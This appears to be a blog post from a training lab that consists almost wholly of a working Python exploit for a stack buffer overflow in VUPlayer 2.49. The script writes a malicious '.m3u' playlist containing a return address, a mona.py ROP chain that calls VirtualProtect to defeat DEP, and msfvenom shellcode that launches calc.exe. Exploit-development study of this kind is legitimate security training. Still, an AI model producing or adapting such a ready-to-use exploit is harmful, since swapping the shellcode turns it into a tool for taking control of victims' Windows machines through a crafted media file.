by: chakoPosted on:

VUPlayer 2.49 stack Buffer Overflow (DEP bypass)

#!/usr/bin/python

# https://www.exploit-db.com/exploits/40018
# VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow (DEP Bypass) 
#
# 
#


import struct


# 0x10015fe8  RETN    ** [BASS.dll] ** 
RET = struct.pack('<L',0x10015fe8)



# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a" -f c -a x86
#Payload size: 220 bytes
shellcode = (
"\xbb\xfe\xd1\xa0\xdb\xdb\xca\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x31\x31\x5d\x13\x83\xc5\x04\x03\x5d\xf1\x33\x55\x27\xe5\x36"
"\x96\xd8\xf5\x56\x1e\x3d\xc4\x56\x44\x35\x76\x67\x0e\x1b\x7a"
"\x0c\x42\x88\x09\x60\x4b\xbf\xba\xcf\xad\x8e\x3b\x63\x8d\x91"
"\xbf\x7e\xc2\x71\xfe\xb0\x17\x73\xc7\xad\xda\x21\x90\xba\x49"
"\xd6\x95\xf7\x51\x5d\xe5\x16\xd2\x82\xbd\x19\xf3\x14\xb6\x43"
"\xd3\x97\x1b\xf8\x5a\x80\x78\xc5\x15\x3b\x4a\xb1\xa7\xed\x83"
"\x3a\x0b\xd0\x2c\xc9\x55\x14\x8a\x32\x20\x6c\xe9\xcf\x33\xab"
"\x90\x0b\xb1\x28\x32\xdf\x61\x95\xc3\x0c\xf7\x5e\xcf\xf9\x73"
"\x38\xd3\xfc\x50\x32\xef\x75\x57\x95\x66\xcd\x7c\x31\x23\x95"
"\x1d\x60\x89\x78\x21\x72\x72\x24\x87\xf8\x9e\x31\xba\xa2\xf4"
"\xc4\x48\xd9\xba\xc7\x52\xe2\xea\xaf\x63\x69\x65\xb7\x7b\xb8"
"\xc2\x47\x36\xe1\x62\xc0\x9f\x73\x37\x8d\x1f\xae\x7b\xa8\xa3"
"\x5b\x03\x4f\xbb\x29\x06\x0b\x7b\xc1\x7a\x04\xee\xe5\x29\x25"
"\x3b\x86\xac\xb5\xa7\x67\x4b\x3e\x4d\x78")


# 0x10010157 :  # POP EBP # RETN    ** [BASS.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
# 0x10014db4 :  # NEG EAX # RETN    ** [BASS.dll] **   |   {PAGE_EXECUTE_READWRITE}
# 0x10015fe7 :  # POP EAX # RETN    ** [BASS.dll] **   |   {PAGE_EXECUTE_READWRITE}
# 0x10032f32 :  # XCHG EAX,EBX # RETN 0x00    ** [BASS.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
# 0x10038a6c :  # XCHG EAX,EDX # RETN    ** [BASS.dll] **   |   {PAGE_EXECUTE_READWRITE}
# 0x10101012 :  # POP ECX # RETN    ** [BASSWMA.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
# 0x10016218 :  # POP EDI # RETN    ** [BASS.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
# 0x10604154 :  # POP ESI # RETN    ** [BASSMIDI.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
# 0x1001d7a5 :  # PUSHAD # RETN    ** [BASS.dll] **   |   {PAGE_EXECUTE_READWRITE}
def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
	  0x10010157,  # POP EBP # RETN
	  0x10010157,  # This address will be popped to EBP, and this is address of POP EBP RETN
	  0x10015fe7,  # POP EAX # RETN
	  0xfffffdff,  # Value to negate (will become 0x201  0x00000201)
	  0x10014db4,  # NEG EAX # RETN
	  0x10032f32,  # XCHG EAX,EBX # RETN 0x00
	  0x10015fe7,  # POP EAX # RETN
	  0xffffffc0,  # Value to negate (will become 0x40  0x0000040)
	  0x10014db4,  # NEG EAX # RETN
	  0x10038a6c,  # XCHG EAX,EDX # RETN
	  0x10101012,  # POP ECX # RETN
	  0x101082db,  # Writable location addr that will popped into ECX (&Writable location [BASSWMA.dll])
	  0x10016218,  # POP EDI # RETN
	  0x1001dc05,  # RETN (ROP NOP) [BASS.dll] - will be stored in EDI
	  0x10604154,  # POP ESI # RETN [BASSMIDI.dll] 
	  0x10101c02,  # JMP [EAX] [BASSWMA.dll] - will be stored in ESI
	  0x10015fe7,  # POP EAX # RETN
	  0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
	  0x1001d7a5,  # PUSHAD # RETN
	  0x10022aa7,  # ptr to 'jmp esp' [BASS.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()


print("\n\n[+] eCXD class lab - Windows Basic Stack Overflow")
print("[+] VUPlayer 2.49 stack Buffer Overflow (DEP bypass)  --   test on Win7 SP1 32 bit ENG")
print("[+] Chako\n\n\n")


print("[-] crafting payload...\n")
print("[-] badchar: 0x00, 0x0a, 0x1a \n")


file = open("exploit.m3u", "w")
buffer = "http://" + "\x41" * 1005
buffer += RET
buffer += rop_chain
buffer += "\x90" * 16
buffer += shellcode
buffer += "\xcc" *(2000-len(buffer))


file.write(buffer)
file.close()